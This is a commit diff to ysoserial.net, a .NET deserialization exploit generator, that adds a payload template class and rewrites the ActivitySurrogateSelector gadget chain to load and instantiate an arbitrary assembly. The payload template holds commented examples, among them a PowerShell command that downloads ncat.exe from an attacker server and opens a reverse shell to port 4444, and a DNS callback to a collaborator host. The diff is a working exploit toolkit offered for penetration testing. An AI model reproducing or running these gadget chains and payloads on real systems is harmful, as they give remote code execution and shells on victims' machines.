
compitable ActivitySurrogateSelectorGenerator

zcgonvh committed Mar 3, 2020
1 parent ee7c1ce commit 385ed1e886a00dba5c7ed57bd774f94ab706498b
@@ -0,0 +1,47 @@
// ExploitClass was renamed to E to reduce the size a little bit
class E
{
public E()
{
//try
//{
/* Payload code to be executed. Examples: */


/* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


/* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll" */
/*
using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
{
outputFile.WriteLine("testme");
}
//*/


/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
//System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


/* Running a command: -c "ExploitClass.cs;./dlls/System.dll" */
//System.Diagnostics.Process.Start("cmd.exe", "/c calc");
//System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");


/* Causing a delay */
//System.Threading.Thread.Sleep(10000); // waits for 10 seconds

/*For web pentesting*/
/*
System.Web.HttpContext.Current.Response.AddHeader("X-YSOSERIAL-NET","HERE");
System.Web.HttpContext.Current.Response.Cookies.Add(new System.Web.HttpCookie("X-YSOSERIAL-NET", "HERE"));
System.Web.HttpContext.Current.Response.End();
*/
//}
//catch (Exception)
//{
//}
}
}
@@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>E</RootNamespace>
<AssemblyName>E</AssemblyName>
<TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\ysoserial\bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\ysoserial\bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="ExploitClass.cs" />
</ItemGroup>
<ItemGroup>
<Folder Include="Properties\" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
@@ -1,10 +1,12 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
# Visual Studio 15
VisualStudioVersion = 15.0.28010.2046
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ysoserial", "ysoserial\ysoserial.csproj", "{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ExploitClass", "ExploitClass\ExploitClass.csproj", "{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@@ -15,8 +17,15 @@ Global
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Release|Any CPU.Build.0 = Release|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1B6D325D-180A-4B70-8A4E-BA521A8FCC4A}
EndGlobalSection
EndGlobal

This file was deleted.

@@ -35,17 +35,28 @@ public class PayloadClass : ISerializable
protected byte[] assemblyBytes;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes(typeof(E).Assembly.Location);
this.assemblyBytes = File.ReadAllBytes(Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "e.dll"));
}

protected PayloadClass(SerializationInfo info, StreamingContext context)
{
}

private IEnumerable<TResult> CreateWhereSelectEnumerableIterator<TSource, TResult>(IEnumerable<TSource> src, Func<TSource, bool> predicate, Func<TSource, TResult> selector)
{
Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089")
.GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2")
.MakeGenericType(typeof(TSource), typeof(TResult));
return t.GetConstructors()[0].Invoke(new object[] { src, predicate, selector }) as IEnumerable<TResult>;
}
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");

//Old technique contains a compiler-generated class [System.Core]System.Linq.Enumerable+<SelectManyIterator>d__[Compiler_Generated_Class_SEQ]`2,
//the Compiler_Generated_Class_SEQ may NOT same in different version of .net framework.
//For example, in .net framework 4.6 was 16,and 17 in .net framework 4.7.

/*
// Build a chain to map a byte array to creating an instance of a class.
// byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win!
List<byte[]> data = new List<byte[]>();
@@ -54,9 +65,50 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
*/

//New technique use [System.Core]System.Linq.Enumerable+WhereSelectEnumerableIterator`2 only to fix it.
//It make compatible from v3.5 to lastest(needs to using v3.5 compiler, and may also need to call disable type check first if target runtime was v4.8+).
//Execution chain: Assembly.Load(byte[]).GetTypes().GetEnumerator().{MoveNext(),get_Current()} -> Activator.CreateInstance() -> Win!
byte[][] e1 = new byte[][] { assemblyBytes };
IEnumerable<Assembly> e2 = CreateWhereSelectEnumerableIterator<byte[], Assembly>(e1, null, Assembly.Load);
IEnumerable<IEnumerable<Type>> e3 = CreateWhereSelectEnumerableIterator<Assembly, IEnumerable<Type>>(e2,
null,
(Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate
(
typeof(Func<Assembly, IEnumerable<Type>>),
typeof(Assembly).GetMethod("GetTypes")
)
);
IEnumerable<IEnumerator<Type>> e4 = CreateWhereSelectEnumerableIterator<IEnumerable<Type>, IEnumerator<Type>>(e3,
null,
(Func<IEnumerable<Type>, IEnumerator<Type>>)Delegate.CreateDelegate
(
typeof(Func<IEnumerable<Type>, IEnumerator<Type>>),
typeof(IEnumerable<Type>).GetMethod("GetEnumerator")
)
);
//bool MoveNext(this) => Func<IEnumerator<Type>,bool> => predicate
//Type get_Current(this) => Func<IEnumerator<Type>,Type> => selector
//
//WhereSelectEnumerableIterator`2.MoveNext =>
// if(predicate(IEnumerator<Type>)) {selector(IEnumerator<Type>);} =>
// IEnumerator<Type>.MoveNext();return IEnumerator<Type>.Current;
IEnumerable<Type> e5 = CreateWhereSelectEnumerableIterator<IEnumerator<Type>, Type>(e4,
(Func<IEnumerator<Type>, bool>)Delegate.CreateDelegate
(
typeof(Func<IEnumerator<Type>, bool>),
typeof(IEnumerator).GetMethod("MoveNext")
),
(Func<IEnumerator<Type>, Type>)Delegate.CreateDelegate
(
typeof(Func<IEnumerator<Type>, Type>),
typeof(IEnumerator<Type>).GetProperty("Current").GetGetMethod()
)
);
IEnumerable<object> end = CreateWhereSelectEnumerableIterator<Type, object>(e5, null, Activator.CreateInstance);
// PagedDataSource maps an arbitrary IEnumerable to an ICollection
PagedDataSource pds = new PagedDataSource() { DataSource = e3 };
PagedDataSource pds = new PagedDataSource() { DataSource = end };
// AggregateDictionary maps an arbitrary ICollection to an IDictionary
// Class is internal so need to use reflection.
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
@@ -71,6 +123,9 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(e4);
ls.Add(e5);
ls.Add(end);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
@@ -144,7 +199,7 @@ public override string Name()

public override string Finders()
{
return "James Forshaw";
return "James Forshaw,fixed by zcgonvh";
}

public override List<string> Labels()
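Review bot: The `PayloadClass()` constructor now loads `"e.dll"`, while the new ExploitClass.csproj sets `<AssemblyName>E</AssemblyName>`, so the artifact written to `..\ysoserial\bin\` is `E.dll`; this only resolves because Windows file names are case-insensitive and would fail with FileNotFoundException on a case-sensitive file system (Mono on Linux). Changing the literal to `"E.dll"` keeps the two in step, and a `File.Exists` check naming the expected path, e.g. `if (!File.Exists(dll)) throw new FileNotFoundException("E.dll must be built next to the ysoserial assembly", dll);`, makes a missing build explicit instead of a bare exception. In `CreateWhereSelectEnumerableIterator`, the `GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator...")` lookup returns null when the runtime does not expose that internal type under that name and `GetConstructors()[0]` assumes exactly one public constructor, so both surface as NullReferenceException/IndexOutOfRangeException rather than a message naming the unsupported runtime; a null check throwing InvalidOperationException is cheap. Since the method depends on an internal System.Core type pinned to version 3.5.0.0 (and on the iterator treating a null predicate as "no filter", which the page does not show), that assumption belongs in a `/// <summary>` on the method rather than only in the comments inside GetObjectData. GetObjectData starts in the first hunk and its body continues outside the visible hunks.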
@@ -122,7 +122,6 @@
<Compile Include="Helpers\FormatterType.cs" />
<Compile Include="Helpers\InputArgs.cs" />
<Compile Include="Helpers\SerializersHelper.cs" />
<Compile Include="ExploitClass.cs" />
<Compile Include="Generators\ActivitySurrogateDisableTypeCheck.cs" />
<Compile Include="Generators\ActivitySurrogateSelectorFromFileGenerator.cs" />
<Compile Include="Generators\ActivitySurrogateSelectorGenerator.cs" />
